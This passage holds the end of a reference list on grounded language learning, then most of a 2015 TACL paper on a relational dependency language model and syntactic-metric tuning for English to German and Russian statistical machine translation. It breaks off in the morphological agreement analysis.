17(3):315–323. Mark Johnson, Katherine Demuth, and Michael Frank. 2012. Exploiting social information in grounded lan- guage learning via grammatical reduction. In ACL. Mark Johnson. 2010. Pcfgs, topic models, adaptor gram- mars and learning topical collocations and the struc- ture of proper names. In ACL. Joohyun Kim and Raymond J. Mooney. 2012. Unsu- pervised pcfg induction for grounded language learn- ing with highly ambiguous supervision. In EMNLP- CoNLL. Joohyun Kim and Raymond J. Mooney. 2013. Adapting discriminative reranking to grounded language learn- ing. In ACL. Alistair Knott and Ted Sanders. 1997. The classification of coherence relations and their linguistic markers: An exploration of two languages. Journal of Pragmatics, 30(2):135–175. Kenichi Kurihara and Taisuke Sato. 2004. An appli- cation of the variational bayesian approach to proba- bilistic contextfree grammars. In IJCNLP Workshop Beyond Shallow Analyses. Kenichi Kurihara and Taisuke Sato. 2006. Variational bayesian grammar induction for natural language. In ICGI. Tom Kwiatkowski, Luke S. Zettlemoyer, Sharon Gold- water, and Mark Steedman. 2010. Inducing proba- bilistic ccg grammars from logical form with higher- order unification. In EMNLP. Alex Lascarides and Nicholas Asher. 1993. Temporal interpretation, discourse relations, and common sense entailment. Linguistics and Philosophy, 16(5):437– 493. Joop M. I. M. Leo. 1991. A general context-free parsing algorithm running in linear time on every lr(k) gram- mar without using lookahead. Theoretical Computer Science, 82(1):165–176. Roger Levy. 2008. Expectation-based syntactic compre- hension. Cognition, 106(3):1126–1177. Percy Liang, Michael I. Jordan, and Dan Klein. 2009. Learning semantic correspondences with less supervi- sion. In ACL-IJCNLP, pages 91–99. Percy Liang, Michael I. Jordan, and Dan Klein. 2011. Learning dependency-based compositional semantics. In Association for Computational Linguistics (ACL). Ziheng Lin, Hwee Tou Ng, and Min-Yen Kan. 2012. A pdtb-styled end-to-end discourse parser. Natural Lan- guage Engineering, FirstView:1–34. Wei Lu, Hwee Tou Ng, Wee Sun Lee, and Luke S. Zettle- moyer. 2008. A generative model for parsing natural language to meaning representations. In EMNLP. William C. Mann and Sandra A. Thompson. 1988. Rhetorical structure theory: Toward a functional the- ory of text organization. Text, 8(3):243–281. Daniel Marcu. 1997. The rhetorical parsing of natural language texts. In ACL. Daniel Marcu. 1999. A decision-based approach to rhetorical parsing. In ACL. Lev Pevzner and Marti A. Hearst. 2002. A critique and improvement of an evaluation metric for text segmen- tation. Computational Linguistics, 28(1):19–36. Livia Polanyi, Chris Culy, Martin Van Den Berg, Gian Lorenzo Thione, and David Ahn. 2004. A rule based approach to discourse parsing. In SigDIAL. Hoifung Poon and Pedro Domingos. 2009. Unsuper- vised semantic parsing. In EMNLP. Lawrence R. Rabiner. 1990. A tutorial on hidden Markov models and selected applications in speech recognition. Remko Scha and Livia Polanyi. 1988. An augmented context free grammar for discourse. In COLING. Jeffrey M. Siskind. 1996. A computational study of cross-situational techniques for learning word-to- meaning mappings. Cognition, 61(1-2):39–91. Benjamin Snyder and Regina Barzilay. 2007. Database- text alignment via structured multilabel classification. In IJCAI. Radu Soricut and Daniel Marcu. 2003. Sentence level discourse parsing using syntactic and lexical informa- tion. In NAACL. Andreas Stolcke. 1995. An efficient probabilistic context-free parsing algorithm that computes prefix probabilities. Computational Linguistics, 21(2):165– 201. Rajen Subba and Barbara Di Eugenio. 2009. An effec- tive discourse parser that uses rich linguistic informa- tion. In NAACL. Stefanie Tellex, Thomas Kolla, Steven Dickerson, Matthew R. Walter, Ashis G. Banerjee, Seth Teller, and Nicholas. Roy. 2011a. Approaching the symbol grounding problem with probabilistic graphical mod- els. AI Magazine, 32(4):64–76. Stefanie Tellex, Thomas Kolla, Steven Dickerson, Matthew R. Walter, Ashis G. Banerjee, Seth Teller, and Nicholas Roy. 2011b. Understanding Natural Lan- guage Commands for Robotic Navigation and Mobile Manipulation. In AAAI. Michael Tomasello and Michael Jeffrey Farrar. 1986. Joint attention and early language. Child development, pages 1454–1463. Adam Vogel and Daniel Jurafsky. 2010. Learning to fol- low navigational directions. In ACL. Yuk Wah Wong and Raymond J. Mooney. 2007. Learn- ing synchronous grammars for semantic parsing with lambda calculus. In ACL. Chen Yu and Dana H. Ballard. 2004. On the integration of grounding language and learning objects. In AAAI. Chen Yu and Dana H Ballard. 2007. A unified model of early word learning: Integrating statistical and social cues. Neurocomputing, 70(13):2149–2165. Luke S. Zettlemoyer and Michael Collins. 2005. Learn- ing to Map Sentences to Logical Form: Structured Classification with Probabilistic Categorial Grammars. In UAI. Michael Zettlemoyer, Luke S.and Collins. 2007. Online learning of relaxed CCG grammars for parsing to log- ical form. In EMNLP-CoNLL. work_cwuwqujlcjb2hduzqfbskahykq ---- Modelling and Optimizing on Syntactic N-Grams for Statistical Machine Translation Rico Sennrich School of Informatics University of Edinburgh 10 Crichton Street Edinburgh EH8 9AB Scotland, UK Abstract The role of language models in SMT is to promote fluent translation output, but tradi- tional n-gram language models are unable to capture fluency phenomena between distant words, such as some morphological agree- ment phenomena, subcategorisation, and syn- tactic collocations with string-level gaps. Syn- tactic language models have the potential to fill this modelling gap. We propose a lan- guage model for dependency structures that is relational rather than configurational and thus particularly suited for languages with a (rel- atively) free word order. It is trainable with Neural Networks, and not only improves over standard n-gram language models, but also outperforms related syntactic language mod- els. We empirically demonstrate its effective- ness in terms of perplexity and as a feature function in string-to-tree SMT from English to German and Russian. We also show that using a syntactic evaluation metric to tune the log-linear parameters of an SMT system fur- ther increases translation quality when cou- pled with a syntactic language model. 1 Introduction Many languages exhibit fluency phenomena that are discontinuous in the surface string, and are thus not modelled well by traditional n-gram language mod- els. Examples include morphological agreement, e.g. subject-verb agreement in languages that do not (exclusively) follow SVO word order, subcategori- sation, and collocations involving distant, but syn- tactically linked words. Syntactic language models try to overcome the limitation to a local n-gram context by using syn- tactically related words (and non-terminals) as con- text information. Despite their theoretical attractive- ness, it has proven difficult to improve SMT with parsers as language models (Och et al., 2004; Post and Gildea, 2008). This paper describes an effective method to model, train, decode with, and weight a syntactic language model for SMT. While all these aspects are important for successfully applying a syntactic lan- guage model, our primary contributions are a novel dependency language model which improves over prior work by making relational modelling assump- tions, which we argue are better suited for languages with a (relatively) free word order, and the use of a syntactic evaluation metric for optimizing the log- linear parameters of the SMT model. While language models that operate on words linked through a dependency chain – called syntactic n-grams (Sidorov et al., 2013) – can improve trans- lation, some of the improvement is invisible to an n-gram metric such as BLEU. As a result, tuning to BLEU does not show the full value of a syntactic language model. What does show its value is an op- timization metric that operates on the same syntactic n-grams that are modelled by the dependency LM. The paper is structured as follows. Section 2 de- scribes our relational dependency language model; section 3 describes our neural network training pro- cedure, and the integration of the model into an SMT decoder. We describe the syntactic evaluation metric we use for tuning in Section 4. The language mod- els are evaluated on the basis of perplexity and SMT 169 Transactions of the Association for Computational Linguistics, vol. 3, pp. 169–182, 2015. Action Editor: Philipp Koehn. Submission batch: 11/2014; Revision batch 2/2015; Published 3/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. performance in section 5. We discuss related work in section 6, and finish with concluding remarks in section 7. 2 A Relational Dependency Language Model As motivation, and working example for the model description, consider the dependency tree in Figure 1, which is taken from the output of our baseline string-to-tree SMT system.1 The output contains two errors: • a morphological agreement error between the subject Ergebnisse (plural) and the finite verb wird (singular). • a subcategorisation error: überraschen is tran- sitive, but the translation has a prepositional phrase instead of an object. While these errors might not have occurred if the words involved were adjacent to one another here and throughout the training set, non-adjacency is common, especially where the distance between subject and finite verb, or between a full verb and its arguments can be arbitrarily long. Prior work on syntactic language modelling has typically focused on English, and we argue that some modelling decisions do not transfer well to other languages. The dependency models proposed by Shen et al. (2010) and Zhang (2009) rely heav- ily on structural information such as the direction and distance of the dependent from the parent. In a language where the order of syntactic dependents is more flexible than in English, such as German2, grammatical function (and thus the inflection) is hard to predict from the dependent order. Instead, we make dependency labels, which encode gram- matical relations, a core element of our model.3 1The tree is converted into constituency format for compati- bility with SCFG decoding algorithms, with dependency edges represented as non-terminal nodes. 2German has a strict word order within noun phrases and for the placement of verbs, but has different word order for main clauses and subordinated clauses, and some flexibility in the order of dependents of a verb. 3Tsarfaty (2010) classifies parsing approaches into config- urational approaches that rely on structural information, and relational ones that take grammatical relations as primitives. While she uses dependency syntax as a prototypical example of Shen et al. (2010) propose a model that estimates probability of each token given its parent and/or pre- ceding siblings. We start with a variant of their model that does not hard-code configurational mod- elling assumptions, and then extend it by including dependency labels. 2.1 Unlabelled Model Let S be a sequence of terminal symbols w1,w2, ...,wn with a dependency topology T , and let hs(i) and ha(i) be lists of heads of preceding siblings and ancestors of wi according to T , from closest to furthest. In our example in Figure 1: • w4 = jüngsten • hs(4) = (der) • ha(4) = (Umfrage, Ergebnisse, wird,�) Note that ha and its subsequences are instances of syntactic n-grams. For this model, we follow re- lated work and assume that T is available (Popel and Marecek, 2010), approximating P(S) as P(S|T). We make the Markov assumption that the probabil- ity of each word only depends on its preceding sib- lings4 and ancestors, and decompose the probability of a sentence like this: P(S) = P(w1,w2, ...,wn) ≈ n∏ i=1 P(wi|hs(i),ha(i)) (1) We further make the Markov assumption that only a fixed window of the closest q siblings, and the clos- est r ancestors, affect the probability of a word. P(S) ≈ n∏ i=1 P(wi|hs(i)q1,ha(i) r 1) (2) Equation 2 represents our basic, unlabelled model. It differs from that of Shen et al. (2010) in two ways. relational approaches, the dependency LM by Shen et al. (2010) would fall into the configurational category, while ours is rela- tional. 4Shen et al. (2010) use the siblings that are between the word and its parent, i.e. the following siblings if the word comes be- fore its parent. We believe both preceding and following sib- lings are potentially useful, but leave expansion of the context to future work. 170 die Ergebnisse der jüngsten Umfrage wird für viele überraschen . root root det subj det attr gmod pp pn aux .manytosurpriseaascomewillpollrecenttheofconclusionsthe sent punct $. . vroot aux VVINF überraschen pp pn PIS viele APPR für VAFIN wird subj gmod NN Umfrage attr ADJA jüngsten det ART der NN Ergebnisse det ART die Figure 1: Translation output of baseline English→German string-to-tree SMT system with original dependency rep- resentation and conversion into constituency representation. First, it uses separate context windows for siblings and ancestors. In contrast, Shen et al. (2010) treat the ancestor as the first symbol in a context window that is shared between the ancestor and siblings. Our formulation encodes our belief that the model should always assume dependence on the r nearest ancestor nodes, regardless of the number of siblings. Sec- ondly, Shen et al. (2010) separate dependents to the left and to the right of the parent. While the fixed SVO verb order in English is compatible with such a separation, allowing PL to model subjects, PR to model objects, most arguments can occur before or after the head verb in German main clauses. We thus argue that left and right dependents should be mod- elled by a single model to allow for sharing of sta- tistical strength.5 2.2 Labelled Model The motivation for the inclusion of dependency la- bels is twofold. Firstly, having dependency labels in the context serves as a strong signal for the pre- diction of the correct inflectional form. Secondly, dependency labels are the appropriate level of ab- 5Similar arguments have been made for parsing of (rela- tively) free word-order languages, e.g. by Tsarfaty et al. (2009). straction to model subcategorisation frames. Let D be a sequence of dependency labels l1, l2, ..., ln, with each label li being the label of the incoming arc at position i in T , and ls(i) and la(i) the list of dependency labels of the siblings and an- cestors of wi, respectively. Continuing the example for w4, these are: • l4 = attr • ls(4) = (det) • la(4) = (gmod, subj, vroot, sent) We predict both the terminal symbols S and de- pendency labels D. The latter lets us model sub- categorisation by penalizing unlikely relations, e.g. objects whose parent is an intransitive verb. We de- compose P(S,D) into P(D)×P(S|D) to obtain: P(S,D) = P(D)×P(S|D) ≈ n∏ i=1 Pl(i)×Pw(i) Pl(i) =P(li|hs(i)q1, ls(i) q 1,ha(i) r 1, la(i) r 1) Pw(i) =P(wi|hs(i)q1, ls(i) q 1,ha(i) r 1, la(i) r 1, li) (3) 171 2.3 Head and Label Extraction We here discuss some details for the extraction of the context hs and ha. Dependency structures re- quire no language-specific head extraction rules, even in a converted constituency representation. In the constituency representation shown in Figure 1, each non-terminal node in the tree that is not a pre- terminal has exactly one pre-terminal child. The head of a non-terminal node can thus be extracted by identifying the pre-terminal child, and taking its terminal symbol as head. An exception is the virtual node sent, which is added to the root of the tree to combine subtrees that are not connected in the orig- inal grammar, e.g. the main tree and the punctuation symbol. If a node has no pre-terminal child, we use a special token � as its head. If the sibling of a node is a pre-terminal node, we represent this through a special token in hs and ls. We also use special out-of-bound tokens (separate for hs, ha, ls and la) to fill up the context window if the window is larger than the number of siblings and/or ancestors. The context extraction rules are language- independent and can be applied to any dependency structure. Language-specific or grammar-specific rules are possible in principle. For instance, for ver- bal heads in German, one could consider separable verb prefixes part of the head, and thus model differ- ences in subcategorisation between schlagen (Engl. beat) and schlagen ... vor (Engl. suggest). 2.4 Predicting the Tree Topology The model in equation 3 still assumes the topology of the dependency tree to be given, and we remedy this by also predicting pre-terminal nodes, and a vir- tual STOP node as the last child of each node. This models the position of the head in a subtree (through the prediction of pre-terminal nodes), and the prob- ability that a word has no more dependents (by as- signing probability mass to the STOP node). Instead of generating all n terminal symbols as in equation 3, we generate all m nodes in the de- pendency tree in top-down, depth-first order, with li being PT for pre-terminals, and the node label oth- erwise, and wi being either the head of the node, or � if the node has no pre-terminal child. Our final model is given in equation 4. N 3 4 5 D det attr gmod S der jüngsten Umfrage T 5 5 2 N 8 9 10 11 12 13 14 15 16 D gmod det PT STOP attr PT STOP PT STOP S Umfrage der � � jüngsten � � � � T 3 8 9 9 8 12 12 8 8 Figure 2: Snippet of prediction steps when generating ter- minals (top) or all nodes in tree (bottom) for dependency tree in Figure 1. P(S,D,T) ≈ m∏ i=1 { Pl(i)×Pw(i), if wi 6= � Pl(i), otherwise (4) Figure 2 illustrates the prediction of a subtree of the dependency tree in Figure 1. Note that T is encoded implicitly, and can be retrieved from D through a stack to which all nodes (except for pre- terminal and STOP nodes) are pushed after predic- tion, and from which the last node is popped when predicting a STOP node. 3 Neural Network Training and SMT Decoding We extract all training instances from automatically parsed training text, and perform training with a standard feed-forward neural network (Bengio et al., 2003), using the NPLM toolkit (Vaswani et al., 2013). Back-off smoothing schemes are unsatisfac- tory because it is unclear which part of the context should be forgotten first, and neural networks ele- gantly solve this problem. We use two separate net- works, one for Pw and one for Pl. Both networks share the same input vocabulary, but are trained and applied independently. The model input is a (2q + 2r)-word context vector (+1 for Pw to encode li), each word being mapped to a shared embedding layer. We use a single hidden layer with rectified- linear activation function, and noise-contrastive es- timation (NCE). We integrate our dependency language models into a string-to-tree SMT system as additional fea- ture functions that score each translation hypothe- sis. The model in equation 4 predicts P(S,D,T). 172 model input input entropy rate 5-gram 5-gram A B C D E 5.25 bigram bigram D E 5.96 5-gram bigram �1 �2 �3 D E 6.13 Table 1: Handling unavailable input words by replacing them with null words. Obtaining the probability of the translation hypoth- esis P(S) would require the (costly) marginaliza- tion over all sequences of dependency labels D and topologies T , but like the SMT decoder itself, we approximate the search for the best translation by searching for the highest-scoring derivation, mean- ing that we directly integrate Pw and Pl as two fea- tures into the log-linear SMT model. We use self- normalized neural networks with precomputation of the hidden layer, which makes the integration into decoding reasonably fast. The decoder builds the translation bottom-up, and the full context is not available for all symbols in the hypothesis. Vaswani et al. (2013) propose to use a special null word for unavailable context, their em- bedding being the weighted average of the input em- beddings of all other words. We adopt this strategy, with the difference that we use separate null words for each position in the context window in order to reflect distributional differences between the differ- ent positions, e.g. between ancestor labels and sib- ling labels. Symbols are re-scored as more context becomes available in decoding, but poor approxima- tions could affect pruning and thus lead to search errors. In Table 1, we illustrate the use of null words with a 5-gram and a bigram NNLM model. We ob- serve a small increase in entropy when querying the 5-gram model with bigrams, compared to querying a bigram model directly. Some hierarchical SMT systems allow glue rules which concatenate two subtrees. Since the resulting glue structures do not occur in the training data, we do not estimate their probability in our model. When encountering the root of a glue rule in our language model, we recursively evaluate its children, but ig- nore the glue node itself. This could introduce a bias towards using more glue rules during transla- tion. To counter this, and encourage the production of linguistically plausible trees, we assign a fixed, high cost to glue rules. Glue rules thus play a small role in our systems, with about 100 glue rule appli- cations per 3000 sentences, and could be abandoned entirely.6 4 Optimizing Syntactic N-grams N-gram based metrics such as BLEU (Papineni et al., 2002) are still predominantly used to optimize the log-linear parameters of SMT systems, and (to a lesser extent) to evaluate the final translation sys- tems. However, n-gram metrics are not well suited to measure fluency phenomena with string-level gaps, and there is a danger that BLEU underesti- mates the modelling power of dependency language models, resulting in a suboptimal assignment of log- linear weights. As an alternative metric that operates on the level of syntactic n-grams, we use a variant of the head-word chain metric (HWCM) (Liu and Gildea, 2005). HWCM is a precision metric similar to BLEU, but instead of counting n-gram matches between the translation output and the reference, it compares head-word chains, or syntactic n-grams. HWCM is not only suitable for our task because it operates on the same structures as the dependency language models, but also because our string-to-tree SMT ar- chitecture produces trees that can be evaluated di- rectly, without requiring a separate parse of the translation output, a task for which few parsers are optimized. For extracting syntactic n-grams from the reference translations of the respective develop- ment and test sets, we automatically parse them, us- ing the same preprocessing as for training. We count syntactic n-grams of sizes 1 to 4, mirror- ing the typical usage of BLEU. Banerjee and Lavie (2005) have demonstrated the importance of recall in MT evaluation, and we compute the harmonic mean of precision and recall, which we denote HWCMf , instead of the original, precision-based metric. 5 Evaluation We perform three evaluations of our dependency language models. Our perplexity evaluation mea- sures model perplexity on the 1-best output of a 6For efficiency reasons, our experimental systems only per- form SCFG parsing for spans of up to 50 words, and use glue rules to concatenate partial derivations in longer sentences. Bet- ter decoding algorithms have reduced the need for this limit (Sennrich, 2014). 173 baseline SMT system and a human reference trans- lation. Our SMT evaluation integrates the model as a feature function in a string-to-tree SMT system and evaluates its impact on translation quality. Finally, we quantify the effect of different language mod- els on grammaticality by measuring the number of agreement errors of our SMT systems. We refer to the unlabelled variant of our model (equation 2) as DLM, and to the labelled variant (equation 4) as RDLM, emphasizing that the latter is a relational dependency LM. 5.1 Data and Methods We perform our experiments on English→German data from the WMT 2014 shared translation task (Bojar et al., 2014), consisting of about 4.5 million sentence pairs of parallel data and 120 million sen- tences of monolingual German data. We train all language models on the German side of the par- allel text and the monolingual data. We also per- form some experiments on the English→Russian data from the same translation task, with 2 million sentence pairs of parallel data and 34 million sen- tences of monolingual Russian data. For a 5-gram Neural Network LM baseline (NNLM), and the dependency language models, we train feed-forward Neural Network language models with the NPLM toolkit. We use 150 dimensions for the input embeddings, and a single hidden layer with 750 dimensions. We use a vocabulary of 500 000 words (70 for the output vocabulary of Pl), from which we draw 100 noise samples for NCE (50 for Pl). We train for two epochs, each epoch being a full traversal of the training text. For unknown words, we back-off to a special unk token for the sequence models and Pl, and to the pre-terminal symbol for the other dependency models. We report perplex- ity values with softmax normalization, but disable normalization during decoding, relying on the self- normalization of NCE for efficiency. For the transla- tion experiments with DLM and RDLM, we set the sibling window size q to 1, and the ancestor window size r to 2.7 We train baseline language models with interpo- lated modified Kneser-Ney smoothing with SRILM 7On our test set, a node has an average of 4.6 ancestors (σ = 2.5), and 1.2 left siblings (σ = 1.3). (Stolcke, 2002). The model in the SMT baseline uses the full vocabulary and a linear interpolation of component models for domain adaptation. For the perplexity evaluation, we use the same vocabulary and training data as for the Neural Network models. For the English→German SMT evaluation, our baseline system is a string-to-tree SMT system with Moses (Koehn et al., 2007), with dependency pars- ing of the German texts (Sennrich et al., 2013). It is described in more detail in (Williams et al., 2014). This setup was ranked 1–2 (out of 18) in the WMT 2014 shared translation task and is state- of-the art. Our biggest deviation from this setup is that we do not enforce the morphological agree- ment constraints that are provided by a unification grammar (Williams and Koehn, 2011), but use them for analysis instead. For English→Russian, we copy the language-independent settings from the the English→German set-up, and perform dependency parsing with a Russian model for the Maltparser (Nivre et al., 2006; Sharoff and Nivre, 2011), ap- plying projectivization after parsing. We tune our system on a development set of 2000 sentences with k-best batch MIRA (Cherry and Fos- ter, 2012) on BLEU and a linear interpolation of BLEU and HWCMf , and report both scores for eval- uation. We also report METEOR (Denkowski and Lavie, 2011) for German and TER (Snover et al., 2006). We control for optimizer instability by run- ning the optimization three times per system and performing significance testing with Multeval (Clark et al., 2011), which we enhanced to also perform sig- nificance testing for HWCMf . 5.2 Implementation notes on model by Shen et al. (2010) We reimplement the model by Shen et al. (2010) for our evaluation. The authors did not specify training and smoothing of their model, so we only adopt their definition of the context window, and use the same neural network architecture as for our other models. Specifically, we use two neural networks: one for left dependents, and one for right dependents. We use maximum-likelihood estimation for the head of root nodes, ignoring unseen events. To distinguish between parents and siblings in the context window, we double the input vocabulary and mark parents with a suffix. Like Shen et al. (2010), we ignore the 174 language model perplexity entropy ref. 1-best difference 5-gram (KN) 232.9 183.3 -4.4% 5-gram NNLM 207.3 207.5 0.0% Shen et al. (2010) 345.1 383.0 1.8% DLM (q=1; r=1) 213.7 259.9 3.6% DLM (q=1; r=2) 136.9 188.3 6.5% RDLM (q=1; r=2) 349.2 734.6 12.7% RDLM, Pw 58.1 85.1 9.4% RDLM, Pl 6.0 8.6 20.1% Table 2: Perplexity of different Neural Network language models (and baseline with Kneser-Ney smoothing) on German reference translation (newstest2013) and base- line English→German translation output. Our goal is a language model that prefers the reference over the trans- lation hypothesis, indicated by a lower perplexity and a positive entropy difference. prediction of STOP labels, meaning that our imple- mentation assumes the dependency topology to be given. We use a trigram model like the original au- thors. Peter et al. (2012) experiment with higher or- ders variants, but do not consider grandparent nodes. We consider scalability to a larger ancestor context a real concern, since another duplication of the vo- cabulary may be necessary for each ancestor level. 5.3 Perplexity There are a number of factors that make a direct comparison of the reference set perplexity unfair. Mainly, the unlabelled dependency model DLM and the one by Shen et al. (2010) assume that the de- pendency topology is given; Pw even assumes this for the dependency labels D. Conversely, the full RDLM predicts the terminal sequence, the depen- dency labels, and the dependency topology, and we thus expect it to have a higher perplexity.8 Also note that we compare 5-gram n-gram models to 3- and 4- gram dependency models. A more minor difference is that n-gram models also predict end-of-sentence tokens, which the dependency models do not. Rather than directly comparing perplexity be- tween different models, our focus lies on a perplex- ity comparison between a human reference transla- tion and the 1-best SMT output of a baseline transla- 8For better comparability, we measure perplexity per surface word, not per prediction. tion system. Our basic assumption is that the differ- ence in perplexity (or cross-entropy) tells us whether a model contains information that is not already part of the baseline model, and if incorporating it into our SMT system can nudge the system towards produc- ing a translation that is more similar to the reference. Results for English→German are shown in ta- ble 2. The baseline 5-gram language model with Kneser-Ney smoothing prefers the SMT output over the reference translation, which is natural given that this language model is part of the system producing the SMT output. The 5-gram NNLM improves over the Kneser-Ney models, and happens to assign al- most the same perplexity score to both texts. This still means that it is less biased towards the SMT output than the baseline model, and can be a valu- able addition to the model. The dependency language models all show a pref- erence for the reference translation, with DLM hav- ing a stronger preference than the model by Shen et al. (2010), and RDLM having the strongest prefer- ence. The direct comparison of DLM and Pw, which is the component of RDLM that predicts the termi- nal symbols, shows that dependency labels serve as a strong signal for predicting the terminals, confirm- ing our initial hypothesis. The prediction of the de- pendency topology and labels through Pl means that the full RDLM has the highest perplexity of all mod- els. However, it also strongly prefers the human ref- erence text over the baseline SMT output. 5.4 Translation Quality Translation results for English→German with dif- ferent language models added to our baseline are shown in Table 3. Considering the systems tuned on BLEU, we observe that the 5-gram NNLM and RDLM are best in terms of BLEU and TER, but that RDLM is the only winner9 according to HWCMf and METEOR. In particular, we observe a sizable gap of 0.6 HWCMf points between the NNLM and the RDLM systems, despite similar BLEU scores. The unlabelled DLM and the dependency LM by Shen et al. (2010), which are generally weaker than RDLM, also tend to improve HWCMf more than BLEU. This reflects the fact that the dependency 9We denote a system a winner if no other system [in the group of systems under consideration] is significantly better ac- cording to significance testing with Multeval. 175 MIRA system dev newstest2013 newstest2014 objective BLEU HWCMf METEOR TER BLEU HWCMf METEOR TER BLEU HWCMf METEOR TER BLEU baseline 34.4 32.6 52.5 47.4 19.8 22.8 39.7* 62.4 20.3 23.2 42.0* 62.7 5-gram NNLM 35.3 33.1 53.2* 46.4 20.4 23.2 40.2 61.7 21.0 23.5 42.5* 62.2 Shen et al. (2010) 34.4* 33.2 52.7* 46.9 20.0 23.2 40.0* 62.3 20.4 23.5 42.3* 62.9 DLM 34.9* 33.8 53.1* 46.8 20.3 23.6 40.1* 61.7 20.8 23.9 42.3* 62.2 RDLM 35.0 33.9 53.1* 46.7 20.5 23.8 40.4* 61.7 21.0 24.1 42.7* 62.2 5-gram + RDLM 35.5 34.0 53.4* 46.3 20.7 23.7 40.6* 61.5 21.4 24.1 42.9* 61.7 BLEU + HWCMf baseline 34.4 33.0* 52.4 46.9* 20.0* 23.0* 39.6 61.9* 20.5* 23.3* 41.8 62.2* 5-gram NNLM 35.2 33.5* 53.0 46.0* 20.6* 23.4* 40.1 60.9* 21.1* 23.6 42.3 61.5* Shen et al. (2010) 34.2 33.8* 52.4 46.4* 20.2* 23.5* 39.8 61.8* 20.7* 23.7* 42.1 62.2* DLM 34.8 34.3* 52.7 45.9* 20.4 23.8* 39.8 60.7* 21.4* 24.2* 42.0 60.9* RDLM 34.9 34.5* 53.0 45.8* 20.9* 24.2* 40.3 60.7* 21.6* 24.5* 42.5 60.8* 5-gram + RDLM 35.4 34.6* 53.2 45.4* 21.0* 24.1* 40.4 60.5* 21.8* 24.4* 42.7 60.6* Table 3: Translation quality of English→German string-to-tree SMT system with different language models, with k- best batch MIRA optimization on BLEU and BLEU+HWCMf . Average of 3 optimization runs. bold: no other system in same block is significantly better (p < 0.05); *: significantly better than same model with other MIRA objective (p < 0.05). Higher scores are better for BLEU, HWCMf and METEOR; lower scores are better for TER. LMs improve fluency along the syntactic n-grams that HWCM measures, whereas NNLM only im- proves local fluency, to which BLEU is most sen- sitive. The fact that the models cover different phe- nomena is also reflected in the fact that we see fur- ther gains from combining the 5-gram NNLM with the strongest dependency LM, RDLM, for a total im- provement of 0.9–1.1 BLEU over the baseline. If we use BLEU+HWCMf as our tuning objec- tive, the difference between the models increases. Compared to the 5-gram NNLM, the RDLM system gains 0.8–0.9 points in HWCMf and 0.3–0.5 points in BLEU. Compared to the original baseline, tuned only on BLEU, the system with RDLM that is tuned on BLEU+HWCMf yields an improvement of 1.1– 1.3 BLEU and 1.3–1.4 HWCMf . If we compare the same system being trained on both tuning objectives, we observe that tuning on BLEU+HWCMf , unsurprisingly, yields higher HWCMf scores than tuning on BLEU only. What is more surprising is that adding HWCMf as a tun- ing objective also yields significantly higher BLEU on the test sets for 9 out of 10 data points. The gap is larger for the two systems with RDLM (0.3–0.6 BLEU) than for the baseline or the NNLM system (0.1–0.2 BLEU). We hypothesize that the inclusion of HWCMf as a tuning metric reduces overfitting and encourages the production of more grammat- ically well-formed constructions, which we expect to be a robust objective across different texts, espe- cially when coupled with a strong dependency lan- guage model such as RDLM. Some example translations are shown in table 4. They illustrate three error types in the baseline sys- tem: 1. an error in subject-verb agreement. 2. a subcategorisation error: gelten is a valid translation of the intransitive meaning of apply, but cannot be used for transitive constructions, where anwenden is correct. 3. a collocation error: two separate collocations are conflated in the baseline translation: • reach a decision on [...] eine Entscheidung über [...] treffen • reach an agreement on [...] eine Einigung über [...] erzielen All errors are due to inter-dependencies in the sen- tence that have string-level gaps, but which can be modelled through syntactic n-grams, and are cor- rected by the system with RDLM and tuning on BLEU+HWCMf . We evaluate a subset of the systems on an English→Russian task to test whether the im- provements from adding RDLM and tuning on BLEU+HWCMf apply to other language pairs. Re- sults are shown in Table 5. The system with RDLM 176 1 source also the user manages his identity and can therefore be anonymous. baseline auch der Benutzer verwaltet seine Identität und können daher anonym sein. best auch der Benutzer verwaltet seine Identität und kann daher anonym sein. reference darüber hinaus verwaltet der Inhaber seine Identität und kann somit anonym bleiben. 2 source how do you apply this definition to their daily life and social networks? baseline wie kann man diese Definition für ihr tägliches Leben und soziale Netzwerke gelten? best wie kann man diese Definition auf ihren Alltag und sozialen Netzwerken anwenden? reference wie wird diese Definition auf seinen Alltag und die sozialen Netzwerke angewendet? 3 source the City Council must reach a decision on this in December. baseline Der Stadtrat muss im Dezember eine Entscheidung darüber erzielen. best Im Dezember muss der Stadtrat eine Entscheidung darüber treffen. reference Im Dezember muss dann noch die Stadtverordnetenversammlung entscheiden. Table 4: SMT output of baseline system and best system (RDLM tuned on BLEU+HWCMf ). MIRA system dev newstest2013 newstest2014 objective BLEU HWCMf TER BLEU HWCMf TER BLEU HWCMf TER BLEU baseline 22.5 21.6 56.7 17.1 18.8 64.7 25.9 23.9 54.5 DLM 23.3* 23.5 56.0 17.5 20.2 64.0 26.4 26.1 53.8 RDLM 23.1 23.7 56.0 17.6 20.4 63.8 26.6 26.5 53.7 BLEU+ HWCMf baseline 22.5 22.9* 56.1* 17.2 19.7* 63.9* 25.8 25.1* 54.1* DLM 23.0 24.1* 55.6* 17.6 20.8* 63.2* 26.4 26.9* 53.3* RDLM 23.1 24.4* 55.4* 17.6 20.9* 63.1* 26.8* 27.3* 53.0* Table 5: Translation quality of English→Russian string-to-tree SMT system with DLM and RDLM, with k-best batch MIRA optimization on BLEU and BLEU+HWCMf . Average of 3 optimization runs. bold: no other system in same block is significantly better (p < 0.05); *: significantly better than same model with other MIRA objective (p < 0.05). Higher scores are better for BLEU and HWCMf ; lower scores are better for TER. is the consistent winner, and significantly outper- forms the baseline for all metrics and test sets. Tun- ing on BLEU+HWCMf results in further improve- ments in HWCMf and TER. Looking at the com- bined effect of adding RDLM and changing the tun- ing objective, we observe gains in BLEU by 0.5–0.9 points, and gains in HWCMf by 2.1–3.4 points. 5.5 Morphological Agreement We argue that the dependency language models and HWCMf as a tuning metric improve grammatical- ity, and we are able to quantify one aspect thereof, morphological agreement, for English→German. Williams and Koehn (2011) introduce a unification grammar with hand-crafted agreement constraints to identify and suppress selected morphological agree- ment violations in German, namely in regards to noun phrase agreement, prepositional phrase agree- ment, and subject-verb agreement. We can use their grammar to analyse the effect of different models on morphological agreement by counting the number of translations that violate at least one agreement con- straint. We assume that the number of false posi- system MIRA objective BLEU BLEU+HWCMf baseline 1028 1018 5-gram NNLM 845 825 Shen et al. (2010) 884 844 DLM 680 599 RDLM 550 468 5-gram + RDLM 576 484 Table 6: Number of English→German translation hy- potheses with at least one agreement error according to unification grammar (Williams and Koehn, 2011) on newstest2013 (3000 sentences). Average of three MIRA runs. tives (i.e. correct analyses that trigger an agreement violation) remains roughly constant throughout all systems, so that a reduction in the 